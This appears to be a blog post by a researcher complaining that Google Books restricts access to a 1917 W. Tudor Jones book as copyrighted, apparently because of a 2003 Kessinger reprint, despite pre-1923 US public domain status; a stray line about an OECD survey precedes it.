-The results of a study of OECD countries. last year showed that only 47% of Norwegians surveyed believed that “education was important.” which was 20% below the average responses in other countries.

Google Books and the Public Domain

I’m looking for an obscure 1917 book by the philosopher and Unitarian minister W. Tudor Jones called the Spiritual Ascent of Man. W. Tudor Jones is mentioned by a Japanese philosopher and pragmatist Sugimori Kôjirô in a separate 1917 book I’m looking at here today in the rare book collection at Harvard. I’m doing some research on Sugimori and I suspect he was influenced by Jones. I wanted to read the Jones book and was delighted to discover that Google books has it! How wonderful, I thought, this will save me a trip to the Divinity school library, where they have a hard copy.

Yet again Google books has showed me how powerful it has become as a tool for researchers. However, when I go to the Google Books copy and view the book, in the right hand margin it says, “Copyrighted Material” and restricts my viewing to a limited number of pages.

When I go to the copyright information at the beginning of the book, it says, “Copyright, 1917 by W. Tudor Jones” and at the bottom of the page it says the publisher is “The Knickerbocker Press, New York”

Here we have a book, copyrighted in 1917 that has been published in the United States. According to this handy chart over at the Cornell Copyright Information Center without condition all books published in the United States before 1923 are in the public domain. Why then does Google deny the visitor access to the remainder of the book?

The most likely answer is that Google has some connection to the book via Kessinger Publishing, which sells reprints of rare books. Have they copyrighted their scan of the book? If you look at the Google introductory page for the book, it lists Kessinger as publishing and copyrighting the book in 2003.

Projects like Google Books and even more, the Gutenberg Project are wonderful resources for research. At Gutenberg’s archive, for example, I was able to download a full copy of a book by Jones examining the work of a German philosopher, Rudolph Euken. However, in the case of Google books, I’m annoyed to see so many books that should be fully in the public domain are showing up as copyrighted. At the Google blog entry on public domain books in Google Books they excitedly announce that you can find books out of copyright by searching for books with the tag “steam engine date:1500-1923″ That is fine and it shows up tens of thousands of books from this period. However, the book I searched is also published before 1923 but like many other books I have found published from this period on Google Books, it is “copyrighted material.” Presumably, Google will now be content to have a 2003 “copyrighted” scan of a public domain 1917 work in its collection.